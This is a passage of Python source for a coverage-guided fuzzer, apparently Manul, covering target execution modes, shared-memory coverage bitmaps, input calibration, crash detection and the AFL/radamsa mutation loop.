self.net_class = None
self.dbi_persistence_on = dbi_persistence_handler
self.dbi_persistence_mode = dbi_persistence_mode
self.dbi_restart_target = True
def init_target_server(self, cmd):
global net_process_is_up
INFO(1, bcolors.BOLD, None, "Launching %s" % cmd)
if sys.platform == "win32":
self.process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
else:
self.process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
preexec_fn=os.setsid)
if not is_alive(self.process.pid):
ERROR("Failed to start target server error code = %d, output = %s" % (self.process.returncode, self.process.stdout))
net_process_is_up = True
time.sleep(INIT_WAIT_TIME)
def net_send_data_to_target(self, data, net_cmd):
global net_process_is_up
if not net_process_is_up:
INFO(1, None, None, "Target network server is down, starting")
self.init_target_server(net_cmd)
self.net_class = manul_network.Network(self.target_ip, self.target_port, self.target_protocol)
if not net_process_is_up: # is it the first run ?
ERROR("The target network application is not started, aborting")
self.net_class.send_test_case(data)
time.sleep(net_sleep_between_cases)
if not is_alive(self.process.pid):
INFO(1, None, None, "Target is dead")
if sys.platform == "win32":
returncode = EXCEPTION_FIRST_CRITICAL_CODE # just take the first critical
else:
returncode = 11
net_process_is_up = False
self.net_class = None
return returncode, "[Manul message] Target is dead"
return 0, ""
def exec_command_forkserver(self, cmd):
if not self.forkserver_is_up:
self.forkserver.init_forkserver(cmd)
self.forkserver_is_up = True
status = self.forkserver.run_via_forkserver()
return status
def handle_dbi_pre(self):
res = self.dbi_persistence_on.recv_command()
if res == 'P':
# our target successfully reached the target function and is waiting for the next command
INFO(1, None, None, "Target successfully reached the target function (pre_handler)")
send_res = self.dbi_persistence_on.send_command('F') # notify the target that we received command
elif res == 'K' and self.dbi_persistence_mode == 2:
INFO(1, None, None, "Target successfully reached the target function (pre_loop_handler) for the first time")
send_res = self.dbi_persistence_on.send_command('P') # notify the target that we received command
elif res == 'Q':
INFO(1, None, None, "Target notified about exit (after post_handler in target)")
self.dbi_restart_target = True
return True
elif res == 'T': # TODO can it happen when we are sending command ?
self.dbi_restart_target = True
return True
else:
ERROR("Received wrong command from the instrumentation library (pre_handler): %s" % res)
return False
def handle_dbi_post(self):
res = self.dbi_persistence_on.recv_command()
if res == 'K':
INFO(1, None, None, "Target successfully exited from the target function (post_handler)")
elif res == 'T':
WARNING(None, "The target failed to answer within given timeframe, restarting")
self.dbi_restart_target = True
return 0
elif res == "":
WARNING(None, "No answer from the target, restarting.")
# the target should be restarted after this (it can be a crash)
self.dbi_restart_target = True
return 1
elif res == "C": # target sent crash signal, handling and restarting
self.dbi_restart_target = True
return 2
else:
ERROR("Received wrong command from the instrumentation library (post_handler)")
return 0
def exec_command_dbi_persistence(self, cmd):
if self.dbi_restart_target:
if self.process != None and is_alive(self.process.pid):
INFO(1, None, None, "Killing the target")
kill_all(self.process.pid)
self.dbi_persistence_on.close_ipc_object() # close if it is not a first run
self.dbi_persistence_on.setup_ipc_object()
if sys.platform == "win32":
self.process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
if not is_alive(self.process.pid):
ERROR("Failed to start the target error code = %d, output = %s" %
(self.process.returncode, self.process.stdout))
self.dbi_persistence_on.connect_pipe_win()
else:
self.process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
preexec_fn=os.setsid)
if not is_alive(self.process.pid):
ERROR("Failed to start the target error code = %d, output = %s" %
(self.process.returncode, self.process.stdout))
INFO(1, None, None, "Target successfully started, waiting for result")
self.dbi_restart_target = False
if self.handle_dbi_pre():
# It means that the target issued quit command or we failed to send command, we should handle it properly
return 0, ""
if self.dbi_persistence_mode == 1:
res = self.handle_dbi_post()
if res == 1:
self.handle_return(1) # use a short 1 second timeout here to check if our target is still alive
return self.process.returncode, self.err
elif res == 2: # TODO: it is only for windows, make it consistent
return EXCEPTION_FIRST_CRITICAL_CODE, "Segmentation fault"
else:
ERROR("Persistence mode not yet supported")
return 0, ""
def handle_return(self, default_timeout):
INFO(1, None, None, "Requesting target state")
if PY3:
try:
self.out, self.err = self.process.communicate(timeout=default_timeout)
except subprocess.TimeoutExpired:
INFO(1, None, None, "Timeout occured")
kill_all(self.process.pid)
return False
else:
self.out, self.err = self.process.communicate() # watchdog will handle timeout if needed in PY2
INFO(1, None, None, "State %s %s" % (self.out, self.err))
return True
def exec_command(self, cmd):
if self.forkserver_on:
self.returncode = self.exec_command_forkserver(cmd)
self.err = ""
return
if self.dbi_persistence_on:
INFO(1, None, None, "Persistence mode")
self.returncode, self.err = self.exec_command_dbi_persistence(cmd)
return
if sys.platform == "win32":
self.process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
else:
self.process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
preexec_fn=os.setsid)
INFO(1, None, None, "Target successfully started, waiting for result")
self.handle_return(self.timeout)
def run(self, cmd):
self.exec_command(cmd)
if isinstance(self.err, (bytes, bytearray)):
self.err = self.err.decode("utf-8", 'replace')
if self.forkserver_on or self.dbi_persistence_on:
return self.returncode, self.err
return self.process.returncode, self.err
class Fuzzer:
def __init__(self, list_of_files, fuzzer_id, virgin_bits_global, args, stats_array, restore_session, crash_bits,
dbi_setup, radamsa_path):
# local fuzzer config
INFO(1, None, None, "Performing intialization of fuzzer %d" % fuzzer_id)
global SHM_SIZE, net_sleep_between_cases
self.SHM_SIZE = SHM_SIZE
self.CALIBRATIONS_COUNT = 7
self.SHM_ENV_VAR = "__AFL_SHM_ID"
self.deterministic = args.deterministic_seed
if self.deterministic:
random.seed(a=fuzzer_id) # self.fuzzer_id is only assigned later in __init__
self.dbi = args.dbi
self.afl_fuzzer = dict()
self.radamsa_path = radamsa_path
if "linux" in sys.platform and "radamsa:0" not in args.mutator_weights:
self.radamsa_fuzzer = radamsa.RadamsaFuzzer(RAND(MAX_SEED))
self.radamsa_fuzzer.load_library(self.radamsa_path)
else:
self.radamsa_fuzzer = None
self.token_dict = list()
self.timeout = args.timeout
self.disable_volatile_bytes = args.disable_volatile_bytes
net_sleep_between_cases = float(args.net_sleep_between_cases)
self.user_mutators = dict()
self.mutator_weights = OrderedDict()
total_weights = 0
try:
weights = args.mutator_weights.split(",")
for weight in weights:
name, weight = weight.split(":")
total_weights += int(weight)
self.mutator_weights[name] = total_weights
except:
ERROR("Invalid format for mutator_weights string, check manul.config file")
if total_weights != 10:
ERROR("Weights in mutator_weights should have 10 in sum, check manul.config file")
try:
if args.dict:
fd = open(args.dict, 'r')
content = fd.readlines()
fd.close()
for line in content:
line = line.replace("\n", "")
if line.startswith("#") or line == "":
continue
line = bytearray(line, "utf-8")
self.token_dict.append(line)
except:
WARNING(None, "Failed to parse dictionary file, dictionary is in invalid format or not accessible")
self.current_file_name = None
self.prev_hashes = dict() # used to store hash of coverage bitmap for each file
for file_name in list_of_files:
self.prev_hashes[file_name] = None
self.cmd_fuzzing = args.cmd_fuzzing
if args.user_signals:
self.user_defined_signals = args.user_signals.split(",")
else:
self.user_defined_signals = None
self.dbi_pipe_handler = None
if dbi_setup:
self.dbi_engine_path = dbi_setup[0]
self.dbi_tool_path = dbi_setup[1]
self.dbi_tool_params = dbi_setup[2]
if args.dbi_persistence_mode >= 1:
INFO(1, None, None, "Getting PIPE name for fuzzer %d" % fuzzer_id)
self.dbi_pipe_handler = dbi_mode.IPCObjectHandler(self.timeout)
obj_name = self.dbi_pipe_handler.get_ipc_obj_name()
INFO(1, None, None, "IPC object name in %s" % (obj_name))
self.dbi_tool_params += "-ipc_obj_name %s" % (obj_name)
self.target_ip = None
self.target_port = None
self.target_protocol = None
if args.target_ip_port:
self.target_ip = args.target_ip_port.split(':')[0]
self.target_port = args.target_ip_port.split(':')[1]
self.target_protocol = args.target_protocol
self.list_of_files = list_of_files
self.fuzzer_id = fuzzer_id
self.virgin_bits = list()
self.virgin_bits = [0xFF] * SHM_SIZE
self.global_map = virgin_bits_global
self.crash_bits = crash_bits # happens not too often
self.bitmap_size = 0
self.avg_bitmap_size = 0
self.avg_exec_per_sec = 0
self.stats_array = stats_array
self.restore = restore_session
# creating output dir structure
self.output_path = args.output + "/%d" % fuzzer_id
self.queue_path = self.output_path + "/queue"
if not args.custom_path:
self.mutate_file_path = self.output_path + "/mutations"
else:
self.mutate_file_path = args.custom_path
self.crashes_path = self.output_path + "/crashes"
self.unique_crashes_path = self.crashes_path + "/unique"
self.enable_logging = args.logging_enable
self.log_file = None
self.user_sync_freq = args.sync_freq
self.sync_bitmap_freq = -1
if not self.restore:
try:
os.mkdir(self.output_path)
except:
ERROR("Failed to create required output dir structure (unique dir)")
try:
os.mkdir(self.queue_path)
except:
ERROR("Failed to create required output dir structure (queue)")
try:
os.mkdir(self.crashes_path)
except:
ERROR("Failed to create required output dir structure (crashes)")
try:
os.mkdir(self.unique_crashes_path)
except:
ERROR("Failed to create required output dir structure (unique crashes)")
if not args.custom_path:
try:
os.mkdir(self.mutate_file_path)
except:
ERROR("Failed to create output directory for mutated files")
self.is_dumb_mode = args.simple_mode
self.input_path = args.input
self.target_binary_path = args.target_binary # and its arguments
self.fuzzer_stats = FuzzerStats()
self.stats_file = None
self.disable_save_stats = args.no_stats
if not self.is_dumb_mode:
self.trace_bits = self.setup_shm()
for i in range(0, self.SHM_SIZE):
if self.virgin_bits[i] != 0xFF:
self.global_map[i] = self.virgin_bits[i]
elif self.global_map[i] != 0xFF and self.virgin_bits[i] == 0xFF:
self.virgin_bits[i] = self.global_map[i]
if self.restore:
if not isfile(self.output_path + "/fuzzer_stats"):
ERROR("Fuzzer stats file doesn't exist. Make sure your output is actual working dir of manul")
self.stats_file = open(self.output_path + "/fuzzer_stats", 'r')
content = self.stats_file.readlines()
line = None
for line in content: # getting last line from file to restore session
pass
if line is None:
ERROR("Failed to restore fuzzer %d from stats. Invalid fuzzer_stats format" % self.fuzzer_id)
last = line[:-2] # skipping last symbol space and \n
INFO(0, None, None, "Restoring last stats %s" % last)
self.stats_file.close()
bitmap = None
if not self.is_dumb_mode:
self.bitmap_file = open(self.output_path + "/fuzzer_bitmap", "rb")
bitmap = self.bitmap_file.read()
self.bitmap_file.close()
self.restore_session(last, bitmap)
if not self.disable_save_stats:
self.stats_file = open(self.output_path + "/fuzzer_stats", 'a+')
self.bitmap_file = open(self.output_path + "/fuzzer_bitmap", 'wb')
if self.enable_logging:
self.log_file = open(self.output_path + "/fuzzer_log", 'a')
self.init_mutators()
self.net_cmd = False
if self.target_ip:
self.net_cmd = self.prepare_cmd_to_run(None, True)
self.forkserver_on = args.forkserver_on
INFO(1, None, None, "Initalization is done for %d" % fuzzer_id)
self.command = Command(self.target_ip, self.target_port, self.target_protocol, self.timeout, args.forkserver_on,
self.dbi_pipe_handler, args.dbi_persistence_mode)
def sync_bitmap(self):
self.sync_bitmap_freq += 1
if (self.sync_bitmap_freq % self.user_sync_freq) != 0:
return
if self.is_dumb_mode:
return
for i in range(0, self.SHM_SIZE):
if self.virgin_bits[i] != 0xFF:
self.global_map[i] = self.virgin_bits[i]
elif self.global_map[i] != 0xFF and self.virgin_bits[i] == 0xFF:
self.virgin_bits[i] = self.global_map[i]
def restore_session(self, last, bitmap):
# parse previously saved stats line
last = last.split(" ")[1:] # cut timestamp
for index, stat in enumerate(last):
stat = float(stat.split(":")[1]) # taking actual value
if PY3:
stat_name = list(self.fuzzer_stats.stats.items())[index][0]
else:
stat_name = self.fuzzer_stats.stats.items()[index][0]
self.fuzzer_stats.stats[stat_name] = stat
if bitmap:
# restoring and synchronizing bitmap
'''for i in range(0, SHM_SIZE):
self.virgin_bits[i] = bitmap[i]
self.sync_bitmap_freq = self.user_sync_freq # little trick to enable synchronization
self.sync_bitmap()
self.sync_bitmap_freq = 0'''
# restoring queue
final_list_of_files = list()
new_files = [f for f in os.listdir(self.queue_path) if os.path.isfile(os.path.join(self.queue_path, f))]
for file_name in new_files:
final_list_of_files.append((1, file_name)) # this is how we add new files
self.list_of_files = self.list_of_files + final_list_of_files
if self.deterministic: # skip already seen seeds
for i in range(0, self.fuzzer_stats.stats['executions']):
random.seed(a=self.fuzzer_id)
def save_stats(self):
if self.stats_file is None:
return
self.stats_file.write(str(time.time()) + " ")
for index, (k,v) in enumerate(self.fuzzer_stats.stats.items()):
self.stats_file.write("%d:%.2f " % (index, v))
self.stats_file.write("\n")
self.stats_file.flush()
# saving AFL state
for file_name in self.list_of_files:
if not isinstance(file_name, string_types) : file_name = file_name[1]
self.afl_fuzzer[file_name].save_state(self.output_path)
def prepare_cmd_to_run(self, target_file_path, is_net):
if self.dbi:
dbi_tool_opt = "-c"
if self.dbi == "pin":
dbi_tool_opt = "-t"
binary_path = "".join(self.target_binary_path)
if self.cmd_fuzzing:
target_file_path = extract_content(target_file_path) # now it is the file content
if not is_net:
binary_path = binary_path.replace("@@", target_file_path)
final_string = "%s %s %s %s -- %s" % (self.dbi_engine_path, dbi_tool_opt, self.dbi_tool_path,
self.dbi_tool_params, binary_path)
else:
final_string = "".join(self.target_binary_path)
if self.cmd_fuzzing:
target_file_path = extract_content(target_file_path) # now it is the file content
target_file_path = target_file_path.decode("utf-8", "replace")
target_file_path = target_file_path.replace('\x00', '')
max_length = os.sysconf('SC_ARG_MAX') - len(final_string) - 3 # reserve room for the '@@' placeholder being replaced
target_file_path = target_file_path[:max_length]
if not is_net:
final_string = final_string.replace("@@", target_file_path)
return final_string
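# Illustrative example (hypothetical paths): with target_binary_path "./parser @@" and a
# mutated file at out/0/mutations/.cur_input, prepare_cmd_to_run() yields
# "./parser out/0/mutations/.cur_input"; in DBI mode the same command is wrapped as
# "<dbi_engine> -c|-t <dbi_tool> <dbi_tool_params> -- ./parser out/0/mutations/.cur_input"
# (-t for pin, -c otherwise).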
def setup_shm_win(self):
from ctypes.wintypes import DWORD, HANDLE, LPCWSTR, LPVOID
FILE_MAP_ALL_ACCESS = 0xF001F
PAGE_READWRITE = 0x04
sh_name = "%s_%s" % (str(int(round(time.time()))), self.fuzzer_id)
szName = c_wchar_p(sh_name)
kernel32_dll = windll.kernel32
create_file_mapping_func = kernel32_dll.CreateFileMappingW
create_file_mapping_func.argtypes = (HANDLE, LPVOID, DWORD, DWORD, DWORD, LPCWSTR)
create_file_mapping_func.restype = HANDLE
map_view_of_file_func = kernel32_dll.MapViewOfFile
map_view_of_file_func.restype = LPVOID
hMapObject = create_file_mapping_func(-1, None,
PAGE_READWRITE, 0, self.SHM_SIZE,
szName)
if not hMapObject or hMapObject == 0:
ERROR("Could not open file mapping object, GetLastError = %d" % GetLastError())
pBuf = map_view_of_file_func(hMapObject, FILE_MAP_ALL_ACCESS, 0, 0,
self.SHM_SIZE)
if not pBuf or pBuf == 0:
ERROR("Could not map view of file, GetLastError = %d" % GetLastError())
INFO(0, None, self.log_file, "Setting up shared mem %s for fuzzer:%d" % (sh_name,
self.fuzzer_id))
os.environ[self.SHM_ENV_VAR] = sh_name
return pBuf
def setup_shm(self):
if sys.platform == "win32":
return self.setup_shm_win()
IPC_PRIVATE = 0
try:
rt = CDLL('librt.so')
except:
rt = CDLL('librt.so.1')
shmget = rt.shmget
shmget.argtypes = [c_int, c_size_t, c_int]
shmget.restype = c_int
shmat = rt.shmat
shmat.argtypes = [c_int, POINTER(c_void_p), c_int]
shmat.restype = c_void_p#POINTER(c_byte * self.SHM_SIZE)
shmid = shmget(IPC_PRIVATE, self.SHM_SIZE, 0o666)
if shmid < 0:
ERROR("shmget() failed")
addr = shmat(shmid, None, 0)
INFO(0, None, self.log_file, "Setting up shared mem %d for fuzzer:%d" % (shmid, self.fuzzer_id))
os.environ[self.SHM_ENV_VAR] = str(shmid)
return addr
def init_mutators(self):
INFO(0, bcolors.BOLD + bcolors.HEADER, self.log_file, "Initializing mutators")
for module_name in self.mutator_weights:
if "afl" == module_name or "radamsa" == module_name:
continue
try:
self.user_mutators[module_name] = importlib.import_module(module_name)
except ImportError as exc:
ERROR("Unable to load user provided mutator %s. %s" % (module_name, exc.message))
self.user_mutators[module_name].init()
# init AFL fuzzer state
for file_name in self.list_of_files:
if not isinstance(file_name, string_types): file_name = file_name[1]
self.afl_fuzzer[file_name] = afl_fuzz.AFLFuzzer(self.token_dict, self.queue_path, file_name) #assign AFL for each file
if self.restore:
self.afl_fuzzer[file_name].restore_state(self.output_path)
def dry_run(self):
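        # Run every initial seed once before fuzzing starts: verify the target executes, the
        # instrumentation actually produces coverage, and warn about seeds that crash the target
        # or do not add any new paths to the bitmap.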
INFO(0, bcolors.BOLD + bcolors.HEADER, self.log_file, "Performing dry run")
useless = 0
for file_name in self.list_of_files:
# if we have tuple and not string here it means that this file was found during execution and located in queue
self.current_file_name = file_name
if not isinstance(file_name, string_types):
file_name = file_name[1]
full_input_file_path = self.queue_path + "/" + file_name
else:
full_input_file_path = self.input_path + "/" + file_name
shutil.copy(full_input_file_path, self.mutate_file_path + "/.cur_input")
full_input_file_path = self.mutate_file_path + "/.cur_input"
memset(self.trace_bits, 0x0, SHM_SIZE)
if self.target_ip:
err_code, err_output = self.command.net_send_data_to_target(extract_content(full_input_file_path), self.net_cmd)
else:
cmd = self.prepare_cmd_to_run(full_input_file_path, False)
INFO(1, bcolors.BOLD, self.log_file, "Launching %s" % cmd)
err_code, err_output = self.command.run(cmd)
if err_code and err_code != 0:
INFO(1, None, self.log_file, "Initial input file: %s triggers an exception in the target" % file_name)
if self.is_critical(err_output, err_code):
WARNING(self.log_file, "Initial input %s leads target to crash (did you disable leak sanitizer?). "
"Enable --debug to check actual output" % file_name)
INFO(1, None, self.log_file, err_output)
elif self.is_problem_with_config(err_code, err_output):
WARNING(self.log_file, "Problematic file %s" % file_name)
trace_bits_as_str = string_at(self.trace_bits, SHM_SIZE)
# count non-zero bytes just to check that instrumentation actually works
            non_zeros = [x for x in bytearray(trace_bits_as_str) if x != 0x0] # bytearray yields ints on both Python 2 and 3
if len(non_zeros) == 0:
INFO(1, None, self.log_file, "Output from target %s" % err_output)
if "is for the wrong architecture" in err_output:
ERROR("You should run 32-bit drrun for 32-bit targets and 64-bit drrun for 64-bit targets")
ERROR("%s doesn't cover any path in the target, Make sure the binary is actually instrumented" % file_name)
ret = self.has_new_bits(trace_bits_as_str, True, list(), self.virgin_bits, False, full_input_file_path)
if ret == 0:
useless += 1
WARNING(self.log_file, "Test %s might be useless because it doesn't cover new paths in the target, consider removing it" % file_name)
else:
self.sync_bitmap()
if useless != 0:
WARNING(self.log_file, "%d out of %d initial files are useless" % (useless, len(self.list_of_files)))
INFO(0, bcolors.BOLD + bcolors.OKBLUE, self.log_file, "Dry run finished")
self.fuzzer_stats.stats['executions'] += 1.0
self.update_stats()
def has_new_bits(self, trace_bits_as_str, update_virgin_bits, volatile_bytes, bitmap_to_compare, calibration, full_input_file_path):
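        # AFL-style bitmap comparison. Returns 2 if the trace touches a byte that is still virgin
        # (a brand new path), 1 if only hit counts of already known paths changed, and 0 otherwise.
        # Offsets listed in volatile_bytes are ignored, and the virgin bitmap is updated in place
        # when update_virgin_bits is set.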
ret = 0
#print_bitmaps(bitmap_to_compare, trace_bits_as_str, full_input_file_path)
if not calibration:
hash_current = zlib.crc32(trace_bits_as_str) & 0xFFFFFFFF
if not isinstance(self.current_file_name, string_types):
self.current_file_name = self.current_file_name[1]
prev_hash = self.prev_hashes.get(self.current_file_name, None)
if prev_hash and hash_current == prev_hash:
return 0
self.prev_hashes[self.current_file_name] = hash_current
for j in range(0, SHM_SIZE):
if j in volatile_bytes:
continue # ignoring volatile bytes
if PY3:
trace_byte = trace_bits_as_str[j] # optimize it and compare by 4-8 bytes or even use xmm0?
else:
trace_byte = ord(trace_bits_as_str[j]) # self.trace_bits.contents[j])#
if not trace_byte:
continue
virgin_byte = bitmap_to_compare[j]
if trace_byte and (trace_byte & virgin_byte):
if ret < 2:
if virgin_byte == 0xff:
ret = 2 # new path discovered
if update_virgin_bits:
self.bitmap_size += 1
else:
ret = 1 # new hit of existent paths
virgin_byte = virgin_byte & ~trace_byte
if update_virgin_bits:
bitmap_to_compare[j] = virgin_byte # python will handle potential synchronization issues
return ret
def calibrate_test_case(self, full_file_path):
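        # Re-run a candidate input CALIBRATIONS_COUNT times and record bitmap offsets that differ
        # between runs as volatile bytes. New coverage is then confirmed with those unstable
        # offsets excluded, so non-deterministic targets don't flood the queue with false findings.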
volatile_bytes = list()
trace_bits_as_str = string_at(self.trace_bits, self.SHM_SIZE) # this is how we read memory in Python
bitmap_to_compare = list("\x00" * self.SHM_SIZE)
for i in range(0, self.SHM_SIZE):
if PY3:
bitmap_to_compare[i] = trace_bits_as_str[i]
else:
bitmap_to_compare[i] = ord(trace_bits_as_str[i])
cmd, data = None, None
if self.target_ip: # in net mode we only need data
data = extract_content(full_file_path)
else:
cmd = self.prepare_cmd_to_run(full_file_path, False)
for i in range(0, self.CALIBRATIONS_COUNT):
INFO(1, None, self.log_file, "Calibrating %s %d" % (full_file_path, i))
memset(self.trace_bits, 0x0, SHM_SIZE)
if self.target_ip: # in net mode we only need data
err_code, err_output = self.command.net_send_data_to_target(data, self.net_cmd)
else:
INFO(1, None, self.log_file, cmd)
if self.cmd_fuzzing:
try:
err_code, err_output = self.command.run(cmd)
except OSError as e:
if e.errno == 7:
WARNING(self.log_file, "Failed to send this input over command line into the target, input too long")
continue
else:
ERROR("Failed to execute command, error:", e)
else:
err_code, err_output = self.command.run(cmd)
if err_code and err_code > 0:
INFO(1, None, self.log_file, "Target raised exception during calibration for %s" % full_file_path)
trace_bits_as_str = string_at(self.trace_bits, SHM_SIZE) # this is how we read memory in Python
if not self.disable_volatile_bytes:
for j in range(0, SHM_SIZE):
if PY3:
trace_byte = trace_bits_as_str[j]
else:
trace_byte = ord(trace_bits_as_str[j])
if trace_byte != bitmap_to_compare[j]:
if j not in volatile_bytes:
volatile_bytes.append(j) # mark offset of this byte as volatile
INFO(1, None, self.log_file, "We have %d volatile bytes for this new finding" % len(volatile_bytes))
# let's try to check for new coverage ignoring volatile bytes
self.fuzzer_stats.stats['blacklisted_paths'] = len(volatile_bytes)
return self.has_new_bits(trace_bits_as_str, True, volatile_bytes, self.virgin_bits, True, full_file_path)
def update_stats(self):
for i, (k,v) in enumerate(self.fuzzer_stats.stats.items()):
self.stats_array[i] = v
def is_problem_with_config(self, exc_code, err_output):
if (exc_code == 127 or exc_code == 126) and not self.cmd_fuzzing: # command not found or permissions
ERROR("Thread %d unable to execute target. Bash return %s" % (self.fuzzer_id, err_output))
elif exc_code == 124: # timeout
WARNING(self.log_file, "Target failed to finish execution within given timeout, try to increase default timeout")
return True
return False
def generate_new_name(self, file_name):
iteration = int(round(self.fuzzer_stats.stats['executions']))
if file_name.startswith("manul"): # manul-DateTime-FuzzerId-iteration_original.name
base_name = file_name[file_name.find("_")+1:]
file_name = base_name
now = int(round(time.time()))
return "manul-%d-%d-%d_%s" % (now, self.fuzzer_id, iteration, file_name)
def is_critical_win(self, exception_code):
if exception_code == STATUS_CONTROL_C_EXIT:
return False
if exception_code >= EXCEPTION_FIRST_CRITICAL_CODE and exception_code < EXCEPTION_LAST_CRITICAL_CODE:
return True
return False
def is_critical_mac(self, exception_code):
if exception_code in critical_signals_nix:
return True
return False
    def is_critical_linux(self, exception_code):
if exception_code in critical_signals_nix:
return True
if self.forkserver_on and os.WIFSIGNALED(exception_code):
return True
return False
def is_critical(self, err_str, err_code):
if err_str and "Sanitizer" in err_str or "SIGSEGV" in err_str or "Segmentation fault" in err_str or \
"core dumped" in err_str or "floating point exception" in err_str:
return True
if self.user_defined_signals and err_code in self.user_defined_signals:
return True
if sys.platform == "win32":
return self.is_critical_win(err_code)
elif sys.platform == "darwin":
return self.is_critical_mac(err_code)
else: # looks like Linux
            return self.is_critical_linux(err_code)
def mutate_radamsa(self, full_input_file_path, full_output_file_path):
if "linux" in sys.platform: # on Linux we just use a shared library to speed up test cases generation
data = extract_content(full_input_file_path)
data_new = self.radamsa_fuzzer.radamsa_generate_output(bytes(data))
save_content(data_new, full_output_file_path)
return 0
new_seed_str = ""
if self.deterministic:
new_seed = random.randint(0, sys.maxsize)
new_seed_str = "--seed %d " % new_seed
cmd = "%s %s%s > %s" % (self.radamsa_path, new_seed_str, full_input_file_path, full_output_file_path)
INFO(1, None, self.log_file, "Running %s" % cmd)
try:
subprocess.check_output(cmd, stderr=subprocess.STDOUT, shell=True) # generate new input
except subprocess.CalledProcessError as exc:
WARNING(self.log_file,
"Fuzzer %d failed to generate new input from %s due to some problem with radamsa. Error code %d. Return msg %s" %
(self.fuzzer_id, full_input_file_path, exc.returncode, exc.output))
return 1
return 0
def mutate_afl(self, file_name, full_input_file_path, full_output_file_path):
data = extract_content(full_input_file_path)
res = self.afl_fuzzer[file_name].mutate(data, self.list_of_files,
self.fuzzer_stats.stats['exec_per_sec'],
self.avg_exec_per_sec, self.bitmap_size,
self.avg_bitmap_size, 0) # TODO: handicap
if not res:
WARNING(self.log_file, "Unable to mutate data provided using afl")
return 1
if len(data) <= 0:
WARNING(self.log_file, "AFL produced empty file for %s", full_input_file_path)
save_content(data, full_output_file_path)
return 0
def mutate_input(self, file_name, full_input_file_path, full_output_file_path):
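        # Pick a mutator (afl, radamsa or a user-provided module) based on mutator_weights. The
        # weights appear to act as thresholds over a rolling window of 10 executions
        # (executions % 10), so with thresholds 7 and 10 the first mutator handles 7 of every 10 runs.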
execution = self.fuzzer_stats.stats['executions'] % 10
for name in self.mutator_weights:
weight = self.mutator_weights[name]
if execution < weight and name == "afl":
return self.mutate_afl(file_name, full_input_file_path, full_output_file_path)
elif execution < weight and name == "radamsa":
return self.mutate_radamsa(full_input_file_path, full_output_file_path)
elif execution < weight:
mutator = self.user_mutators.get(name, None)
if not mutator:
ERROR("Unable to load user provided mutator %s at mutate_input stage" % name)
data = extract_content(full_input_file_path)
data = mutator.mutate(data)
if not data:
ERROR("No data returned from user provided mutator. Exciting.")
save_content(data, full_output_file_path)
return 0
else:
continue
def run(self):
if not self.is_dumb_mode:
self.dry_run()
last_stats_saved_time = 0
if self.restore:
INFO(0, bcolors.BOLD + bcolors.OKBLUE, self.log_file, "Session successfully restored")
start_time = timer()
cycle_id = 0
while True: # never return
new_files = list() # empty the list
elapsed = 0
cycle_id += 1
for i, file_name in enumerate(self.list_of_files):
self.current_file_name = file_name
crash_found = False
self.fuzzer_stats.stats['file_running'] = i
full_input_file_path = self.input_path + "/"
# if we have tuple and not string here it means that this file was found during execution and located in queue
if not isinstance(file_name, string_types):
file_name = file_name[1]
full_input_file_path = self.queue_path + "/"
full_input_file_path += file_name
if not self.is_dumb_mode:
memset(self.trace_bits, 0x0, SHM_SIZE) # preparing our bitmap for new run
mutated_name = ".cur_input"
full_output_file_path = self.mutate_file_path + "/" + mutated_name
# command to generate new input using one of selected mutators
res = self.mutate_input(file_name, full_input_file_path, full_output_file_path)
if res != 0:
ERROR("Fuzzer %d failed to generate and save new input on disk" % self.fuzzer_id)
timer_start = timer()
if self.target_ip:
data = extract_content(full_output_file_path)
exc_code, err_output = self.command.net_send_data_to_target(data, self.net_cmd)
else:
cmd = self.prepare_cmd_to_run(full_output_file_path, False)
first_iteration = False
INFO(1, None, self.log_file, "Running %s" % cmd)
if self.cmd_fuzzing:
try:
exc_code, err_output = self.command.run(cmd)
except OSError as e:
if e.errno == 7:
WARNING(self.log_file, "Failed to send this input over command line into the target, input too long")
continue
else:
ERROR("Failed to execute command, error:", e)
else:
exc_code, err_output = self.command.run(cmd)
self.fuzzer_stats.stats['executions'] += 1.0
elapsed += (timer() - timer_start)
if exc_code and exc_code != 0:
self.fuzzer_stats.stats['exceptions'] += 1
INFO(1, None, self.log_file, "Target raised exception and returns 0x%x error code" % (exc_code))
if self.is_critical(err_output, exc_code):
INFO(0, bcolors.BOLD + bcolors.OKGREEN, self.log_file, "New crash found by fuzzer %d" % self.fuzzer_id)
self.fuzzer_stats.stats["last_crash_time"] = time.time()
new_name = self.generate_new_name(file_name)
shutil.copy(full_output_file_path, self.crashes_path + "/" + new_name) # copying into crash folder
self.fuzzer_stats.stats['crashes'] += 1
if not self.is_dumb_mode:
trace_bits_as_str = string_at(self.trace_bits, SHM_SIZE) # this is how we read memory in Python
ret = self.has_new_bits(trace_bits_as_str, True, list(), self.crash_bits, False, full_output_file_path)
if ret == 2:
INFO(0, bcolors.BOLD + bcolors.OKGREEN, self.log_file, "Crash is unique")
self.fuzzer_stats.stats['unique_crashes'] += 1
shutil.copy(full_output_file_path, self.unique_crashes_path + "/" + new_name) # copying into crash folder with unique crashes
crash_found = True
elif self.is_problem_with_config(exc_code, err_output):
WARNING(self.log_file, "Problematic file: %s" % file_name)
if not crash_found and not self.is_dumb_mode:
# Reading the coverage
trace_bits_as_str = string_at(self.trace_bits, SHM_SIZE) # this is how we read memory in Python
# we are not ready to update coverage at this stage due to volatile bytes
ret = self.has_new_bits(trace_bits_as_str, False, list(), self.virgin_bits, False, full_output_file_path)
if ret == 2:
INFO(1, None, self.log_file, "Input %s produces new coverage, calibrating" % file_name)
if self.calibrate_test_case(full_output_file_path) == 2:
self.fuzzer_stats.stats['new_paths'] += 1
self.fuzzer_stats.stats['last_path_time'] = time.time()
INFO(1, None, self.log_file, "Calibration finished successfully. Saving new finding")
new_coverage_file_name = self.generate_new_name(file_name)
INFO(1, None, self.log_file, "Copying %s to %s" % (full_output_file_path,
self.queue_path + "/" + new_coverage_file_name))
shutil.copy(full_output_file_path, self.queue_path + "/" + new_coverage_file_name)
new_files.append((1, new_coverage_file_name))
# for each new file assign new AFLFuzzer
self.afl_fuzzer[new_coverage_file_name] = afl_fuzz.AFLFuzzer(self.token_dict, self.queue_path,
new_coverage_file_name)
self.prev_hashes[new_coverage_file_name] = None
self.update_stats()
self.sync_bitmap()
